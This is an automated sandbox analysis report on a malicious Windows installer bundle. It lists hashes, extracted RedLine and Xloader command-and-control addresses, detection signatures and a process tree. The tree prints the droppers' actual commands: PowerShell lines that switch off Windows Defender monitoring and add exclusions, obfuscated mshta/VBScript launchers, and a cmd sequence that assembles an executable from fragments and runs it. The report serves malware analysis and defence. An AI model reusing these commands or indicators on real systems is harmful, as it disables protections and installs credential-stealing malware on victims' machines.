Resubmissions

01-11-2021 20:09

211101-yw5kbaafg5 10

01-11-2021 07:13

211101-h2lrdsdhhj 10

01-11-2021 06:40

211101-hfpk6adhfj 10

31-10-2021 18:27

211031-w3r7fsdafj 10

31-10-2021 14:10

211031-rgstmscghm 10

31-10-2021 08:02

211031-jxchlacefm 10

31-10-2021 06:36

211031-hczxqacddp 10

31-10-2021 06:23

211031-g5wv4affb3 10

Analysis

  • max time kernel
    347s
  • max time network
    4954s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    31-10-2021 06:36

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.5MB

  • MD5

    3da25ccfa9c258e3ae26854391531c7b

  • SHA1

    1ed5613b0ad8ab4c47f07e52199a4edd27be40e6

  • SHA256

    62be0ca52ea9ebc4c577d597b919f6b90cebdcc2179d7d482a04bf5731eec720

  • SHA512

    defed576df3d8325259884b485a0dc7cd673c47028e77f189255e27dca312a0befdc8dc84106cc3103a3027e67a835fad899f9361076a64831db144354a4618c

Malware Config

Extracted

Family

redline

Botnet

srtupdate33

C2

135.181.129.119:4805

Extracted

Family

xloader

Version

2.5

Campaign

s0iw

C2

http://www.kyiejenner.com/s0iw/

Decoy

ortopediamodelo.com

orimshirts.store

universecatholicweekly.info

yvettechan.com

sersaudavelsempre.online

face-booking.net

europeanretailgroup.com

umofan.com

roemahbajumuslim.online

joyrosecuisine.net

3dmaker.house

megdb.xyz

stereoshopie.info

gv5rm.com

tdc-trust.com

mcglobal.club

choral.works

onlineconsultantgroup.com

friscopaintandbody.com

midwestii.com

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 2 IoCs
  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 27 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Xloader

    Xloader is a rebranded version of Formbook malware.

  • suricata: ET MALWARE FormBook CnC Checkin (GET)

    suricata: ET MALWARE FormBook CnC Checkin (GET)

  • suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

    suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile

  • suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

    suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin

  • suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

    suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Xloader Payload 2 IoCs
  • ASPack v2.12-2.42 6 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 5 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 32 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Loads dropped DLL 61 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 5 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 16 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 15 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
  • Suspicious use of SetThreadContext 10 IoCs
  • Drops file in Program Files directory 21 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 21 IoCs
  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 64 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 5 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Enumerates system info in registry 2 TTPs 45 IoCs
  • Kills process with taskkill 9 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
  • Modifies data under HKEY_USERS 3 IoCs
  • Modifies registry class 1 IoCs
  • Modifies system certificate store 2 TTPs 6 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 13 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Drops file in Program Files directory
    • Modifies registry class
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of UnmapMainImage
    PID:3196
    • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
      "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3336
      • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
        "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
        3⤵
        • Executes dropped EXE
        • Suspicious use of WriteProcessMemory
        PID:1448
        • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\setup_install.exe
          "C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\setup_install.exe"
          4⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Suspicious use of WriteProcessMemory
          PID:2488
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:4928
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1352
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1080
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
              6⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:1316
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c Sun039750b00c.exe
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1592
            • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun039750b00c.exe
              Sun039750b00c.exe
              6⤵
              • Executes dropped EXE
              PID:2664
              • C:\Windows\SysWOW64\mshta.exe
                "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun039750b00c.exe"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if """" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun039750b00c.exe"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                7⤵
                  PID:4472
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun039750b00c.exe" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "" == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun039750b00c.exe" ) do taskkill -Im "%~Nxm" /F
                    8⤵
                      PID:4004
                      • C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE
                        WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI
                        9⤵
                        • Executes dropped EXE
                        PID:2148
                        • C:\Windows\SysWOW64\mshta.exe
                          "C:\Windows\System32\mshta.exe" vbsCRipt: CLoSE( createOBJeCT ( "wsCript.ShelL"). rUn ( "cMD.exE /R tyPe ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if ""-PRt0qXDI7zI "" == """" for %m in ( ""C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE"" ) do taskkill -Im ""%~Nxm"" /F " , 0 , TrUe ) )
                          10⤵
                            PID:2976
                            • C:\Windows\SysWOW64\cmd.exe
                              "C:\Windows\System32\cmd.exe" /R tyPe "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" > wXE1XgqZIR_W9IM.exE && start WXE1XgqzIr_w9IM.eXe -PRt0qXDI7zI & if "-PRt0qXDI7zI " == "" for %m in ( "C:\Users\Admin\AppData\Local\Temp\wXE1XgqZIR_W9IM.exE" ) do taskkill -Im "%~Nxm" /F
                              11⤵
                                PID:5584
                            • C:\Windows\SysWOW64\mshta.exe
                              "C:\Windows\System32\mshta.exe" VBSCripT: CLOse ( CReAteoBjECt ( "wScrIPT.SHeLL" ). RuN ( "CmD /C EcHo | sEt /P = ""MZ"" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV + Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV " , 0 , TRUe ))
                              10⤵
                                PID:3136
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /C EcHo | sEt /P = "MZ" > QKYLkI3.T & CopY /Y /b QKYLkI3.T +KXCn0WxW.e+ 8QfI1D5v.X + 52TbWL.SZV +Y4JTKX.X9 +88N4.I + xU3XyT.P UKHPFGIw.UMV & START msiexec.exe -Y .\UKHPfGIw.UMV
                                  11⤵
                                    PID:6176
                                    • C:\Windows\SysWOW64\cmd.exe
                                      C:\Windows\system32\cmd.exe /S /D /c" sEt /P = "MZ" 1>QKYLkI3.T"
                                      12⤵
                                        PID:6572
                                      • C:\Windows\SysWOW64\cmd.exe
                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                        12⤵
                                          PID:4364
                                        • C:\Windows\SysWOW64\msiexec.exe
                                          msiexec.exe -Y .\UKHPfGIw.UMV
                                          12⤵
                                          • Loads dropped DLL
                                          PID:3236
                                  • C:\Windows\SysWOW64\taskkill.exe
                                    taskkill -Im "Sun039750b00c.exe" /F
                                    9⤵
                                    • Kills process with taskkill
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:1260
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sun03f0dc4460bc9.exe
                            5⤵
                            • Suspicious use of WriteProcessMemory
                            PID:2972
                            • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f0dc4460bc9.exe
                              Sun03f0dc4460bc9.exe
                              6⤵
                              • Executes dropped EXE
                              • Suspicious use of SetThreadContext
                              PID:3132
                              • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f0dc4460bc9.exe
                                C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f0dc4460bc9.exe
                                7⤵
                                • Executes dropped EXE
                                PID:1756
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c Sun0397381f1f458e.exe
                            5⤵
                              PID:2100
                              • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun0397381f1f458e.exe
                                Sun0397381f1f458e.exe
                                6⤵
                                • Executes dropped EXE
                                PID:5060
                                • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun0397381f1f458e.exe
                                  "C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun0397381f1f458e.exe" -u
                                  7⤵
                                  • Executes dropped EXE
                                  PID:4132
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun03e4aeb7e43a1c.exe
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1912
                              • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03e4aeb7e43a1c.exe
                                Sun03e4aeb7e43a1c.exe
                                6⤵
                                • Executes dropped EXE
                                PID:3412
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 3412 -s 240
                                  7⤵
                                  • Program crash
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  PID:5316
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun033e271e0ce96c08.exe /mixone
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1548
                              • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun033e271e0ce96c08.exe
                                Sun033e271e0ce96c08.exe /mixone
                                6⤵
                                • Executes dropped EXE
                                PID:4388
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 240
                                  7⤵
                                  • Program crash
                                  • Checks processor information in registry
                                  • Enumerates system info in registry
                                  PID:1636
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun03d477f1a31.exe
                              5⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1560
                              • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03d477f1a31.exe
                                Sun03d477f1a31.exe
                                6⤵
                                • Executes dropped EXE
                                • Suspicious use of AdjustPrivilegeToken
                                PID:2516
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 2516 -s 1992
                                  7⤵
                                  • Program crash
                                  PID:1004
                            • C:\Windows\SysWOW64\cmd.exe
                              C:\Windows\system32\cmd.exe /c Sun038aa349e3318e.exe
                              5⤵
                                PID:2264
                                • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun038aa349e3318e.exe
                                  Sun038aa349e3318e.exe
                                  6⤵
                                  • Executes dropped EXE
                                  PID:4880
                                  • C:\Users\Admin\Pictures\Adobe Films\1aeIbfXq5eJCp4JtjQlDrLNt.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\1aeIbfXq5eJCp4JtjQlDrLNt.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:4456
                                  • C:\Users\Admin\Pictures\Adobe Films\0fCYzA8z5OBsI6qUaPoJ9Xgl.exe
                                    "C:\Users\Admin\Pictures\Adobe Films\0fCYzA8z5OBsI6qUaPoJ9Xgl.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5536
                                    • C:\ProgramData\build.exe
                                      "C:\ProgramData\build.exe"
                                      8⤵
                                        PID:3340
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\ProgramData\build.exe" & del C:\ProgramData\*.dll & exit
                                          9⤵
                                            PID:7056
                                            • C:\Windows\SysWOW64\taskkill.exe
                                              taskkill /im build.exe /f
                                              10⤵
                                              • Kills process with taskkill
                                              PID:4564
                                            • C:\Windows\SysWOW64\timeout.exe
                                              timeout /t 6
                                              10⤵
                                              • Delays execution with timeout.exe
                                              PID:1368
                                      • C:\Users\Admin\Pictures\Adobe Films\tvxhCE_lX_laPrvYgJpAHQcQ.exe
                                        "C:\Users\Admin\Pictures\Adobe Films\tvxhCE_lX_laPrvYgJpAHQcQ.exe"
                                        7⤵
                                          PID:5572
                                        • C:\Users\Admin\Pictures\Adobe Films\jymMuKWFVqqCMEHaIQqA3Mzx.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\jymMuKWFVqqCMEHaIQqA3Mzx.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5556
                                        • C:\Users\Admin\Pictures\Adobe Films\QJdtIFqZ3SaexLzUxPPr45c6.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\QJdtIFqZ3SaexLzUxPPr45c6.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of AdjustPrivilegeToken
                                          PID:5744
                                        • C:\Users\Admin\Pictures\Adobe Films\RGuIedNRj2Bfnb24ykmEeVe2.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\RGuIedNRj2Bfnb24ykmEeVe2.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Suspicious use of SetThreadContext
                                          PID:5712
                                          • C:\Users\Admin\Pictures\Adobe Films\RGuIedNRj2Bfnb24ykmEeVe2.exe
                                            "C:\Users\Admin\Pictures\Adobe Films\RGuIedNRj2Bfnb24ykmEeVe2.exe"
                                            8⤵
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:4384
                                        • C:\Users\Admin\Pictures\Adobe Films\arhKu83DD5xhnQFKmGIj5gLs.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\arhKu83DD5xhnQFKmGIj5gLs.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5704
                                        • C:\Users\Admin\Pictures\Adobe Films\xS1Zkc4plNO_9r_RZ6LMjwYg.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\xS1Zkc4plNO_9r_RZ6LMjwYg.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          PID:5696
                                        • C:\Users\Admin\Pictures\Adobe Films\DkL_8Yb60VETEzCxPUZRzJw9.exe
                                          "C:\Users\Admin\Pictures\Adobe Films\DkL_8Yb60VETEzCxPUZRzJw9.exe"
                                          7⤵
                                          • Executes dropped EXE
                                          • Drops file in Program Files directory
                                          PID:5688
                                          • C:\Users\Admin\Documents\UTF7piUYTsgvdjVCAabvY1aR.exe
                                            "C:\Users\Admin\Documents\UTF7piUYTsgvdjVCAabvY1aR.exe"
                                            8⤵
                                              PID:7064
                                              • C:\Users\Admin\Pictures\Adobe Films\wZ5MVWeiP3PcimZHfdkIWuKv.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\wZ5MVWeiP3PcimZHfdkIWuKv.exe"
                                                9⤵
                                                • Executes dropped EXE
                                                • Drops file in Windows directory
                                                • Checks processor information in registry
                                                • Enumerates system info in registry
                                                PID:1004
                                              • C:\Users\Admin\Pictures\Adobe Films\jBFGaywNjqJw66rwMuyX5LgN.exe
                                                "C:\Users\Admin\Pictures\Adobe Films\jBFGaywNjqJw66rwMuyX5LgN.exe"
                                                9⤵
                                                  PID:1552
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1552 -s 236
                                                    10⤵
                                                    • Program crash
                                                    • Checks processor information in registry
                                                    • Enumerates system info in registry
                                                    PID:6208
                                                • C:\Users\Admin\Pictures\Adobe Films\fX0YxZzLAwCvU1K05S26HNI1.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\fX0YxZzLAwCvU1K05S26HNI1.exe"
                                                  9⤵
                                                    PID:4920
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 4920 -s 236
                                                      10⤵
                                                      • Program crash
                                                      • Checks processor information in registry
                                                      • Enumerates system info in registry
                                                      PID:1944
                                                  • C:\Users\Admin\Pictures\Adobe Films\Hy9TChhaWHX0I8_xaz4Pcu1B.exe
                                                    "C:\Users\Admin\Pictures\Adobe Films\Hy9TChhaWHX0I8_xaz4Pcu1B.exe"
                                                    9⤵
                                                      PID:5152
                                                    • C:\Users\Admin\Pictures\Adobe Films\eex0LxgApr7_Odadb_EKvWOI.exe
                                                      "C:\Users\Admin\Pictures\Adobe Films\eex0LxgApr7_Odadb_EKvWOI.exe"
                                                      9⤵
                                                        PID:1996
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1996 -s 1764
                                                          10⤵
                                                          • Program crash
                                                          • Checks processor information in registry
                                                          • Enumerates system info in registry
                                                          PID:236
                                                      • C:\Users\Admin\Pictures\Adobe Films\VhqZMYZGkBpUJfGC9ECaUpFC.exe
                                                        "C:\Users\Admin\Pictures\Adobe Films\VhqZMYZGkBpUJfGC9ECaUpFC.exe"
                                                        9⤵
                                                          PID:6952
                                                          • C:\Users\Admin\AppData\Local\Temp\is-MJ27G.tmp\VhqZMYZGkBpUJfGC9ECaUpFC.tmp
                                                            "C:\Users\Admin\AppData\Local\Temp\is-MJ27G.tmp\VhqZMYZGkBpUJfGC9ECaUpFC.tmp" /SL5="$30364,506127,422400,C:\Users\Admin\Pictures\Adobe Films\VhqZMYZGkBpUJfGC9ECaUpFC.exe"
                                                            10⤵
                                                            • Loads dropped DLL
                                                            PID:1444
                                                            • C:\Users\Admin\AppData\Local\Temp\is-51VC0.tmp\ShareFolder.exe
                                                              "C:\Users\Admin\AppData\Local\Temp\is-51VC0.tmp\ShareFolder.exe" /S /UID=2710
                                                              11⤵
                                                              • Drops file in Drivers directory
                                                              • Checks processor information in registry
                                                              • Enumerates system info in registry
                                                              PID:1452
                                                              • C:\Users\Admin\AppData\Local\Temp\2d-fe36b-79a-94fab-e0eb66c06c811\Gehajufeci.exe
                                                                "C:\Users\Admin\AppData\Local\Temp\2d-fe36b-79a-94fab-e0eb66c06c811\Gehajufeci.exe"
                                                                12⤵
                                                                  PID:6644
                                                                  • C:\Windows\System32\cmd.exe
                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bmq4oiim.plb\GcleanerEU.exe /eufive & exit
                                                                    13⤵
                                                                      PID:5408
                                                                      • C:\Users\Admin\AppData\Local\Temp\bmq4oiim.plb\GcleanerEU.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\bmq4oiim.plb\GcleanerEU.exe /eufive
                                                                        14⤵
                                                                          PID:7060
                                                                      • C:\Windows\System32\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\jpaluqcb.ybe\installer.exe /qn CAMPAIGN="654" & exit
                                                                        13⤵
                                                                          PID:4820
                                                                          • C:\Users\Admin\AppData\Local\Temp\jpaluqcb.ybe\installer.exe
                                                                            C:\Users\Admin\AppData\Local\Temp\jpaluqcb.ybe\installer.exe /qn CAMPAIGN="654"
                                                                            14⤵
                                                                              PID:7604
                                                                          • C:\Windows\System32\cmd.exe
                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u4qc1ivq.c3i\any.exe & exit
                                                                            13⤵
                                                                              PID:7800
                                                                              • C:\Users\Admin\AppData\Local\Temp\u4qc1ivq.c3i\any.exe
                                                                                C:\Users\Admin\AppData\Local\Temp\u4qc1ivq.c3i\any.exe
                                                                                14⤵
                                                                                  PID:8708
                                                                              • C:\Windows\System32\cmd.exe
                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3kdnmpyt.zyr\gcleaner.exe /mixfive & exit
                                                                                13⤵
                                                                                  PID:8312
                                                                                  • C:\Users\Admin\AppData\Local\Temp\3kdnmpyt.zyr\gcleaner.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\3kdnmpyt.zyr\gcleaner.exe /mixfive
                                                                                    14⤵
                                                                                      PID:8776
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\xeptpvaq.ch4\autosubplayer.exe /S & exit
                                                                                    13⤵
                                                                                      PID:8652
                                                                            • C:\Users\Admin\Pictures\Adobe Films\lLDECWqgvSj583ydSpskB4V0.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\lLDECWqgvSj583ydSpskB4V0.exe"
                                                                              9⤵
                                                                                PID:2400
                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                  "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\lLDECWqgvSj583ydSpskB4V0.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\lLDECWqgvSj583ydSpskB4V0.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                                  10⤵
                                                                                    PID:3668
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\lLDECWqgvSj583ydSpskB4V0.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\lLDECWqgvSj583ydSpskB4V0.exe" ) do taskkill -f -iM "%~NxM"
                                                                                      11⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:2644
                                                                                      • C:\Windows\SysWOW64\taskkill.exe
                                                                                        taskkill -f -iM "lLDECWqgvSj583ydSpskB4V0.exe"
                                                                                        12⤵
                                                                                        • Kills process with taskkill
                                                                                        PID:1080
                                                                                • C:\Users\Admin\Pictures\Adobe Films\EcPLBSgDutTrPHHq6hkzEbT1.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\EcPLBSgDutTrPHHq6hkzEbT1.exe"
                                                                                  9⤵
                                                                                    PID:6620
                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-2TTAT.tmp\EcPLBSgDutTrPHHq6hkzEbT1.tmp
                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-2TTAT.tmp\EcPLBSgDutTrPHHq6hkzEbT1.tmp" /SL5="$1045C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\EcPLBSgDutTrPHHq6hkzEbT1.exe"
                                                                                      10⤵
                                                                                        PID:2544
                                                                                        • C:\Users\Admin\AppData\Local\Temp\is-NL08O.tmp\ShareFolder.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\is-NL08O.tmp\ShareFolder.exe" /S /UID=2709
                                                                                          11⤵
                                                                                          • Drops file in Drivers directory
                                                                                          PID:6392
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7a-725c6-69d-565ad-0473a94b8733f\Lefikyhykae.exe
                                                                                            "C:\Users\Admin\AppData\Local\Temp\7a-725c6-69d-565ad-0473a94b8733f\Lefikyhykae.exe"
                                                                                            12⤵
                                                                                              PID:4468
                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\u4v3zcr2.mle\GcleanerEU.exe /eufive & exit
                                                                                                13⤵
                                                                                                  PID:1300
                                                                                                  • C:\Users\Admin\AppData\Local\Temp\u4v3zcr2.mle\GcleanerEU.exe
                                                                                                    C:\Users\Admin\AppData\Local\Temp\u4v3zcr2.mle\GcleanerEU.exe /eufive
                                                                                                    14⤵
                                                                                                      PID:6280
                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\czn2pwwf.kyd\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                    13⤵
                                                                                                      PID:10116
                                                                                                      • C:\Users\Admin\AppData\Local\Temp\czn2pwwf.kyd\installer.exe
                                                                                                        C:\Users\Admin\AppData\Local\Temp\czn2pwwf.kyd\installer.exe /qn CAMPAIGN="654"
                                                                                                        14⤵
                                                                                                        • Loads dropped DLL
                                                                                                        • Enumerates connected drives
                                                                                                        • Modifies system certificate store
                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                        PID:6640
                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1vu3iwe2.zn5\any.exe & exit
                                                                                                      13⤵
                                                                                                        PID:10224
                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1vu3iwe2.zn5\any.exe
                                                                                                          C:\Users\Admin\AppData\Local\Temp\1vu3iwe2.zn5\any.exe
